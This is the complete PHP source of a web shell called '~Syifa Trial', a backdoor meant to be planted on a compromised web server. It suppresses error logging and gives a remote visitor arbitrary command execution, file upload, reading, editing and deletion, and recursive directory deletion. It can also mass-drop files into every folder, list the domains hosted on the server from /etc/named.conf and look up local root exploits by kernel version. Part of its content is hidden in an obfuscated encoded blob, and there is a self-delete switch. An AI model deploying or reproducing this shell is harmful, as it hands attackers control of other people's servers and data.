Syifa Trial

1. <?php
2.  
3. error_reporting(0);
4. @ini_set('error_log', NULL);
5. @ini_set('log_errors', 0);
6. class shell{
7. public $getcwd;
8. public $uname;
9. public $host;
10. public $server_ip;
11. public $your_ip;
12. public $menu;
13. public $time;
14. public $data;
15. public function __construct(){
16. $this->getcwd = getcwd();
17. $this->uname = php_uname('a');
18. $this->host = $_SERVER['HTTP_HOST'];
19. $this->server_ip = $_SERVER['SERVER_ADDR'];
20. $this->your_ip = $_SERVER['REMOTE_ADDR'];
21. $this->menu = "";
22. $this->time = date('d M Y H:i:s');
23. }
24. // safe_mode
25. public function safe_mode($on,$off){
26. if(@ini_get("safe_mode")){
27. return $on;
28. }else{
29. return $off;
30. }
31. }
32. // ukuran (file)
33. public function size($size){
34. if($size >= 1073741824){
35. return round($size/1073741824, 1)." GB";
36. }elseif($size >= 1048576){
37. return round($size/1048576, 1)." MB";
38. }elseif($size >= 1024){
39. return round($size/1024, 2)." KB";
40. }else{
41. return $size." B";
42. }
43. }
44. //buat exec command
45. public function execute($exe){
46. if($s = shell_exec($exe)){
47. return $s;
48. }elseif($s = exec($exe)){
49. return $s;
50. }elseif($s = system($exe)){
51. return $s;
52. }elseif($s = passthru($exe)){
53. return $s;
54. }
55. }
56. //disable function
57. public function dfunction($o,$n){
58. if(@ini_get("disable_functions")){
59. return $o;
60. }else{
61. return $n;
62. }
63. }
64. public function menu($p){
65. $this->menu .= "<span><a href=\"".$_SERVER['PHP_SELF']."\">Home</a></span>";
66. $this->menu .= "<span><a href=\"?about\">About</a></span>";
67. $this->menu .= "<span><a href=\"?upload&dir=".$p."\">Upload</a></span>";
68. $this->menu .= "<span><a href=\"?exec&dir=".$p."\">Exec</a></span>";
69. $this->menu .= "<span><a href=\"?mass&dir=".$p."\">Mass File</a></span>";
70. $this->menu .= "<span><a href=\"?domain&dir=".$p."\">Domain</a></span>";
71. $this->menu .= "<span><a href=\"?root&dir=".$p."\">Root Vuln</a></span>";
72. $this->menu .= "<span><a href=\"?newfile&dir=".$p."\">New File</a></span>";
73. $this->menu .= "<span><a href=\"?newfolder&dir=".$p."\">New Folder</a></span>";
74. $this->menu .= "<span><a href=\"?kill&dir=".$p."\">Kill Me</a></span>";
75. return $this->menu;
76. }
77. public function root_vuln(){
78. $version_kernel = php_uname('r');
79. $version = explode('-', $version_kernel);
80. echo "<br>SystemKernel : ".php_uname('-a')."<br>";
81. $exploits = array(
82. 'w00t' =>
83. '2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4.16','
84. 2.4.20',
85. 'brk' => '2.4.22','2.4.21','2.4.10','2.4.20',
86. 'elflbl' => '2.4.29',
87. 'expand_stack' => '2.4.29',
88. 'h00lyshit' => '2.6.8','2.6.10','2.6.11','2.6.12',
89. 'kdump' => '2.6.13',
90. 'km2' => '2.4.18','2.4.22',
91. 'krad' => '2.6.11',
92. 'krad3' => '2.6.11','2.6.9',
93. 'local26' =>'2.6.13',
94. 'mremap_pte'=>'2.4.20','2.2.25','2.4.24',
95. 'newlocal'=>'2.4.17','2.4.19',
96. 'ong_bak'=>'2.4.','2.6.',
97. 'ptrace'=>'2.2.24','2.4.22',
98. 'ptrace_kmod'=>'2.4.','2.6.',
99. 'ptrace24'=>'2.4.9',
100. 'pwned'=>'2.4.','2.6.',
101. 'py2'=>'2.6.9','2.6.17','2.6.15','2.6.13',
102. 'raptor_prctl'=>'2.6.13','2.6.17','2.6.16','2.6.13',
103. 'prctl3'=>'2.6.13','2.6.17','2.6.9',
104. 'stackgrow2'=>'2.4.29','2.6.10',
105. 'uselib24'=>'2.4.29','2.6.10','2.4.22','2.4.25',
106. 'exp.sh'=>'2.6.9','2.6.10','2.6.16','2.6.13',
107. 'prctl'=>'2.6.',
108. 'kmdx'=>'2.6.','2.4.');
109. $rootexploit = array_search($version[0], $exploits);
110. if($rootexploit==NULL){
111. echo "RootExploit : Tidak ada
112. RootExploit tersebut pada daftar kami";
113. }else{
114. echo "RootExploit : ".$rootexploit;
115. }
116. }
117.  
118. public function modified($m){
119. $filemtime = filemtime($m);
120. $date = date("d M Y H:i", $filemtime);
121. return $date;
122. }
123.  
124. public function delete_d($de){
125. $gl = glob($de.'*', GLOB_MARK);
126. foreach($gl as $dir_d){
127. $del = (is_dir($dir_d)) ? $this->delete_d($dir_d) : unlink($dir_d);
128. }
129. if(is_dir($de)) @rmdir($de);
130. }
131.  
132. public function perms($fi){
133. $perms = fileperms($fi);
134.  
135. if(($perms & 0xC000) == 0xC000){
136. // Socket
137. $info = 's';
138. }elseif(($perms & 0xA000) == 0xA000){
139. // Symbolic Link
140. $info = 'l';
141. }elseif(($perms & 0x8000) == 0x8000){
142. // Regular
143. $info = '-';
144. }elseif(($perms & 0x6000) == 0x6000){
145. // Block special
146. $info = 'b';
147. }elseif(($perms & 0x4000) == 0x4000){
148. // Directory
149. $info = 'd';
150. }elseif(($perms & 0x2000) == 0x2000){
151. // Character special
152. $info = 'c';
153. }elseif(($perms & 0x1000) == 0x1000){
154. // FIFO pipe
155. $info = 'p';
156. }else{
157. // Unknown
158. $info = 'u';
159. }
160.  
161. // Owner
162. $info .= (($perms & 0x0100) ? 'r' : '-');
163. $info .= (($perms & 0x0080) ? 'w' : '-');
164. $info .= (($perms & 0x0040) ?
165. (($perms & 0x0800) ? 's' : 'x' ) :
166. (($perms & 0x0800) ? 'S' : '-'));
167.  
168. // Group
169. $info .= (($perms & 0x0020) ? 'r' : '-');
170. $info .= (($perms & 0x0010) ? 'w' : '-');
171. $info .= (($perms & 0x0008) ?
172. (($perms & 0x0400) ? 's' : 'x' ) :
173. (($perms & 0x0400) ? 'S' : '-'));
174.  
175. // World
176. $info .= (($perms & 0x0004) ? 'r' : '-');
177. $info .= (($perms & 0x0002) ? 'w' : '-');
178. $info .= (($perms & 0x0001) ?
179. (($perms & 0x0200) ? 't' : 'x' ) :
180. (($perms & 0x0200) ? 'T' : '-'));
181. return $info;
182. }
183. public function x37($x37){
184. $x64 = str_replace(hex2bin("31333337"), hex2bin("61"), $x37);
185. $x86 = base64_decode(hex2bin($x64));
186. return $x86;
187. }
188. public function server($svr){
189. if(function_exists($svr)){
190. return "ON";
191. }else{
192. return "OFF";
193. }
194. }
195. public function help($help){
196. if($this->execute($help)){
197. return "ON";
198. }else{
199. return "OFF";
200. }
201. }
202. }
203. $obj = new shell;
204. $obj->data = (object) array("title"=>"~Syifa", "version"=>"Trial !", "coder"=>"Adip Perdana");
205. $title = $obj->data->title;
206. $version = $obj->data->version;
207. $coder = $obj->data->coder;
208. //background
209. echo "<html>
210. <head>
211. <title>".$title." ".$version."</title>
212. <style media=\"all,handheld\">
213. body{color: #fff; font-size: 12px; font-family: sans-serif; background-color: #222;background-repeat: no-repeat; background-position: bottom;}
214. input{background-color: #333; color: #fff; border: 1px solid black;}
215. td{background-color: #333; padding: 2px;font-size: 12px; color: white;text-align: center;}
216. textarea{background-color: #333; color: #fff; border: 1px solid black;min-height: 200px;}
217. a{color: white;text-decoration: none;font-size: 12px;display: inline-block;}
218. #footer{text-align: right;font-size: 8px;}
219. span a{background: #333;color: #fff;padding: 3px;margin: 2px 2px 0 0;text-align: center;display: inline-block;}
220. </style>
221. </head>
222. <body>
223. <center>
224. ";
225. $indo = "rVS7buMwEPwlPZwPMMDA0AG7Bg2yoFoVRsioTsSvv5klZSTNVVcYsL2PmZ2dpYbroDVdtJZRXPqWKrPWJz7+Td1zWIN8aY6j1u2iuyAnVnXvVepW8b3lh+d0d8i7CfL8pFUmCXHW7BF77JrLIHmrGqwOOa1O6nVY8waccqTsq2aLz3e37nrzswSp6DXobQEue7W45nToHkcJCf+VKlneDDMj35V6D+C++6HVE7cA8/GpdRnuIXXs2OPs5UfwmxRaIMZa9jqQwxm/fvAqmhfijeQOnFlvsfFxG3AxS7gi5ruO0NQwIrlP94BeO3oGavafsXJBH+S4NPW5voGPuj8fmqEh91cZixdyaTtY0Gf9OPdydydv+01MaLJMqUZgcd9ywY7Bqe+d/fL6ifpf+wPWhO+DukeRfcGcL19Bg3TmYVcPYJNbbJ4Bf4H3xLy3AXdDj4K47zt7J15Ry0sH+WNezL6MrYcfMU9R+MI84LauP7RqWkLfzbwJvaeU2UPgXXpqAQ59dJ3UYRa3nDoSB/5YM3Sc1vAo7KHmx4Ra7IN51CYUxP1bmxk8duQ7uyPOAk0893XYHFUO1kM3xtkfd/KOHVh/zEFPFMTPGxPekPE8cxo/alEQPzWSH3eBu87PUzNwME1w0+Qi6IOZgNFvdVpzgt6219n0evn42rHAeScX8wM8ih3ibeBM3TPkfb4PM96T2mfL3WOD5cKr6GEaww8DvaUBPnrtIA7pX56xvDjxLjqvivcC+yceeXHu2LWW7vkF89n88Lx8c5fwyNH72g02rzeNqO8vzuatyHfxzMEdm47YMd7H1z4iNZ/tXWl3Cs95eph8u/e4r0emj9bcb4pa78tf";
226. //border :1px solid green
227. echo "<p style=\"text-align: left;\">Kernel : ".$obj->uname."<br>";
228. echo "Disable function : ".$obj->dfunction(@ini_get("disable_functions"),"NONE")."<br>";
229. echo "Safe mode : ".$obj->safe_mode("ON","OFF")."<br>";
230. echo "Host : ".$obj->host." | Server ip : ".$obj->server_ip." | Your ip : ".$obj->your_ip." | Time Server : ".$obj->time.
231. "<br>MySQL : ".$obj->server('mysql_connect')." | MSSQL : ".$obj->server('mssql_connect')." | cURL : ".$obj->server('curl_version')." | Oracle : ".$obj->server('ocilogon')." | wget : ".$obj->help('wget --help')." | Perl : ".$obj->help('perl -h').
232. "</p>";
233. //path getcwd
234. if(isset($_GET['dir'])){
235. $obj->getcwd = $_GET['dir'];
236. }else{
237. $obj->getcwd = getcwd();
238. }
239. $str = str_replace("\\", "/", $obj->getcwd);
240. $exp = explode("/", $str);
241. foreach($exp as $k=>$path){
242. echo "<a href=\"?dir=";
243. for($i=0;$i<=$k;$i++){
244. echo $exp[$i];
245. if($i!=$k){
246. echo "/";
247. }
248. }
249. echo "\">".$path."</a>";
250. echo "/";
251. }
252. //menu
253. echo "<p style=\"text-align: left;\">".$obj->menu($obj->getcwd)."</p>";
254. $up = $obj->getcwd;
255. if(isset($_GET['about'])){
256. echo "</center>".$obj->x37(base64_decode(gzinflate(base64_decode($indo))));
257. }elseif(isset($_GET['upload']) && isset($_GET['dir'])){
258. echo "<br>".$_GET['dir'];
259. echo "<br>Upload File :
260. <form method=\"post\" enctype=\"multipart/form-data\">
261. <input type=\"file\" name=\"up\">
262. <input type=\"submit\" name=\"upl\" value=\"Upload\"><br></form>";
263. if(isset($_POST['upl'])=="Upload"){
264. if(copy($_FILES['up']['tmp_name'],$up."/".$_FILES['up']['name'])){
265. $file = $_FILES['up']['tmp_name'];
266. $file = $_FILES['up']['name'];
267. echo "Save To ".$up."<br>";
268. echo $file." Upload Success !";
269. }else{
270. echo $file." Upload Failed !";
271. }
272. }
273. }elseif(isset($_GET['exec']) && isset($_GET['dir'])){
274. echo "<form method=\"post\">
275. <input type=\"text\" name=\"exec\">
276. <input type=\"submit\" name=\"exc\" value=\"Exec command\"></form></center>";
277. if(isset($_POST['exc'])){
278. $exc = $_POST['exec'];
279. echo "<pre>".$obj->execute($exc)."</pre>";
280. }
281. }elseif(isset($_GET['mass']) && isset($_GET['dir'])){
282. echo "<br>".$_GET['dir'];
283. echo "<br><form method=\"post\">
284. <textarea name=\"mass\">
285. </textarea>
286. <input type=\"submit\" name=\"mass_f\" value=\"Mass File\"></form>";
287. $x = "x.txt";
288. if(isset($_POST['mass_f'])){
289. if(file_exists($x)){
290. unlink($x);
291. }
292. $t = touch($x);
293. $fp = fopen($x, "a+");
294. fwrite($fp, $_POST['mass']);
295. if(is_dir($obj->getcwd)){
296. if($op = opendir($obj->getcwd)){
297. while(($re = readdir($op)) !== false){
298. if(is_dir("$obj->getcwd/$re")){
299. $homo = "$obj->getcwd/$re/homo.txt";
300. if(@copy($x, $homo)){
301. echo "<br>".$homo." OK";
302. }
303. }
304. }
305. }
306. }
307. }
308. }elseif(isset($_GET['domain']) && isset($_GET['dir'])){
309. get_named("/etc/named.conf");
310. }elseif(isset($_GET['root']) && isset($_GET['dir'])){
311. echo "<p style=\"text-align: left;\">";
312. $obj->root_vuln();
313. echo "</p>";
314. }elseif(isset($_GET['kill']) && isset($_GET['dir'])){
315. unlink(__FILE__);
316. /* options file */
317. // buka file
318. }elseif(isset($_GET['file']) && isset($_GET['dir'])){
319. echo "<p style=\"text-align: left; border: 1px solid black;\">";
320. echo "File Path : ".$_GET['file']."</p>";
321. $fpx = fopen($_GET['file'], "r");
322. if($fpx){
323. echo "<pre>";
324. echo "<p style=\"text-align: left; \">";
325. while(!feof($fpx)){
326. echo htmlspecialchars(fread($fpx,1024));
327. }
328. echo "</pre></p>";
329. }
330. fclose($fpx);
331. //edit
332. }elseif(isset($_GET['edit']) &&
333. isset($_GET['filepath']) && isset($_GET['dir'])){
334. echo "<br>File path : ".$_GET['filepath'];
335. if(isset($_POST['edt'])){
336. $fop = fopen($_GET['filepath'], "w");
337. if(fwrite($fop,$_POST['edt'])){
338. echo "<br>Edit Success ".$obj->time;
339. }else{
340. echo "<br>Can't Edit This File";
341. }
342. fclose($fop);
343. }
344. echo "<form method=\"post\">
345. <pre>
346. <textarea name=\"edt\">";
347. $get = htmlspecialchars(@file_get_contents($_GET['filepath']));
348. echo $get;
349. echo "</textarea></pre>
350. <input type=\"submit\" value=\"Save\">";
351. //rename
352. }elseif(isset($_GET['rename']) && isset($_GET['filepath']) && isset($_GET['dir'])){
353. echo "<br>File Path : ".$_GET['filepath'];
354. echo "<br><form method=\"post\">
355. Rename File :
356. <input type=\"text\" name=\"rename\">
357. <input type=\"submit\" value=\"Rename\"></form><br>";
358. if(isset($_POST['rename'])){
359. if(@rename($_GET['filepath'],$obj->getcwd."/".$_POST['rename'])){
360. echo "Rename File Success";
361. }else{
362. echo "Can't Rename This File";
363. }
364. }
365. }elseif(isset($_GET['delete']) && isset($_GET['filepath']) && isset($_GET['dir'])){
366. if(@unlink($_GET['filepath'])){
367. echo "<br>Delete File Success";
368. }else{
369. echo "<br>Can't Delete This File";
370. }
371. //end file
372. /* options directory */
373. }elseif(isset($_GET['drename']) && isset($_GET['dirpath']) && isset($_GET['dir'])){
374. echo "<p style=\"text-align: left; border: 1px solid black;\">
375. Dir Path : ".$_GET['dirpath']."</p>";
376. echo "<form method=\"post\">
377. <p style=\"text-align: left;\">Rename Dir :
378. <input type=\"text\" name=\"dirrename\">
379. <input type=\"submit\" value=\"Save\"></form></p>";
380. if(isset($_POST['dirrename'])){
381. if(@rename($_GET['dirpath'],$obj->getcwd."/".$_POST['dirrename'])){
382. echo "Rename Dir Success";
383. }else{
384. echo "Can't Rename This Directory";
385. }
386. }
387. }elseif(isset($_GET['ddelete']) && isset($_GET['dirpath']) && isset($_GET['dir'])){
388. $obj->delete_d($_GET['dirpath']);
389. }elseif(isset($_GET['newfile']) && isset($_GET['dir'])){
390. echo "<br>".$_GET['dir'];
391. echo "<br>New File :
392. <form method=\"post\">
393. <input type=\"text\" name=\"newfile\">
394. <input type=\"submit\" value=\"Save\"><br>";
395. $nfile = $_POST['newfile'];
396. if(isset($nfile)){
397. if(@touch("$obj->getcwd/$nfile")){
398. echo "Create File Success";
399. }else{
400. echo "Can't Create File";
401. }
402. }
403. }elseif(isset($_GET['newfolder']) && isset($_GET['dir'])){
404. echo "<br>".$_GET['dir'];
405. echo "<br>New Folder :
406. <form method=\"post\">
407. <input type=\"text\" name=\"nfolder\">
408. <input type=\"submit\" value=\"Save\"><br>";
409. $mkd = $_POST['nfolder'];
410. if(isset($mkd)){
411. if(@mkdir("$obj->getcwd/$mkd")){
412. echo "Create Folder Success";
413. }else{
414. echo "Can't Create Folder";
415. }
416. }
417. }
418. else{
419. $dname = array();
420. $fname = array();
421. if($open = @opendir($obj->getcwd)){
422. while($read = @readdir($open)){
423. if(is_dir("$obj->getcwd/$read")){
424. $dname[] = $read;
425. }elseif(is_file("$obj->getcwd/$read")){
426. $fname[] = $read;
427. }
428. }
429. closedir($open);
430. }
431. sort($dname);
432. sort($fname);
433.  echo "<table border=\"0\">
434. <tr>
435. <td><center>Name</center></td>
436. <td><center>Size</center></td>
437. <td><center>Permission</td>
438.  
439. <td><center>Options</center></td></tr>";
440. foreach($dname as $folder){
441. if($folder=="."){
442. echo "
443. <tr>
444. <td>
445. <a href=\"?dir="."$obj->getcwd"."\">[".$folder."]</a></td>
446. <td><center>LINK</center></td>
447. <td><center>".$obj->perms("$obj->getcwd/$folder")."</center></td>
448. <td>
449. <center>
450. <a href=\"?drename&dirpath="."$obj->getcwd/$folder"."&dir=$obj->getcwd"."\">rename</a> <a href=\"?ddelete&dirpath="."$obj->getcwd/$folder"."&dir=$obj->getcwd"."\">delete</a>
451. </td>
452. </tr>";
453. }elseif($folder==".."){
454. echo "<tr>
455. <td>
456. <a href=\"?dir=$obj->getcwd"."\">[".$folder."]</a></td>
457. <td><center>LINK</center></td>
458. <td><center>".$obj->perms("$obj->getcwd/$folder")."</center></td>
459. <td><center><a href=\"?drename&dirpath="."$obj->getcwd/$folder"."&dir=$obj->getcwd"."\">rename</a> <a href=\"?ddelete&dirpath="."$obj->getcwd/$folder"."&dir=$obj->getcwd"."\">delete</a>
460. </td>
461. </tr>
462. ";
463. }elseif(is_dir("$obj->getcwd/$folder")){
464. echo "
465. <tr>
466. <td>
467. <a href=\"?dir="."$obj->getcwd/$folder"."\">[".$folder."]</a>
468. </td>
469. <td><center>DIR</center></td>
470. <td><center>".$obj->perms("$obj->getcwd/$folder")."</center></td>
471.  
472. <td><a href=\"?drename&dirpath="."$obj->getcwd/$folder"."&dir=$obj->getcwd"."\"><center>rename</a> <a href=\"?ddelete&dirpath="."$obj->getcwd/$folder"."&dir=$obj->getcwd"."\">delete</center></a></td>
473. </tr>";
474. }
475. }
476. foreach($fname as $file){
477. if(is_file("$obj->getcwd/$file")){
478. echo "
479. <tr>
480. <td>
481. <a href=\"?file="."$obj->getcwd/$file"."&dir=$obj->getcwd"."\">".$file."</a>
482. </td>
483. <td><center>".$obj->size(@filesize("$obj->getcwd/$file"))."</center></td>
484. <td><center>".$obj->perms("$obj->getcwd/$file")."</center></td>
485.  
486. <td><a href=\"?edit&filepath="."$obj->getcwd/$file"."&dir=$obj->getcwd"."\"><center>edit</a> <a href=\"?rename&filepath="."$obj->getcwd/$file"."&dir=$obj->getcwd"."\">rename</a> <a href=\"?delete&filepath="."$obj->getcwd/$file"."&dir=$obj->getcwd"."\">delete</center></a>
487. </td>
488. </tr>";
489. }
490. }
491. echo "</table>
492. <div id=\"footer\">Coded by ".$coder." &copy; 2015 - ".date('Y')."</div>";
493. }
494. function get_named($g){
495. $no=0;
496. $get = @file_get_contents($g);
497. if($get==NULL){
498. echo "<br>Cant read /etc/named.conf";
499. }else{
500. echo "<table border=\"0\">
501. <tr>
502. <td>No</td>
503. <td>Domain</td>
504. </tr>";
505. if(preg_match_all("#/var/named/(.*?).db#", $get, $value)? $value[1] : FALSE){
506. sort($value[1]);
507. $unix = array_unique($value[1]);
508. foreach($unix as $domain){
509. $no=$no+1;
510. echo "<tr><td>".$no."</td>
511. <td>".$domain."</td>
512. </tr>";
513. }
514. }
515. echo "</table>";
516. }
517. }
518.  
519. ?>